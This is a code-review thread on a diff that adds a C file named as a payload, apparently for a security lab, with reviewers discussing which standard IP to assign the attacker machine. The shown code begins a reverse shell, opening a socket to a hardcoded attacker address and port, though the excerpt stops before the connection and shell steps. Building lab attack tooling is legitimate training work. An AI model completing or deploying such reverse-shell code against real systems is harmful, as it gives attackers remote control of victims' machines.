payload/cpayload.c

```diff
@@ -0,0 +1,28 @@
+#include <stdio.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+
+int main(void){
+    int port = 87;
+    struct sockaddr_in revsockaddr;
+
+    int sockt = socket(AF_INET, SOCK_STREAM, 0);
+    revsockaddr.sin_family = AF_INET;       
+    revsockaddr.sin_port = htons(port);
+    revsockaddr.sin_addr.s_addr = inet_addr("172.19.51.168");
```

Comment:
Is this the IP address of one of the machines in the internal network? 

If so, we should standardize the IP address otherwise different people using different IPs in the same repo might cause conflicts later. Example: everyone assigns 10.10.10.1 to the attacker's machine, 10.10.10.2 to the web server, and 10.10.10.3 to the client machine.

Reply:
yes, you are right. I should correct this. What is the ip we set for attacker system? is it 10.10.10.4?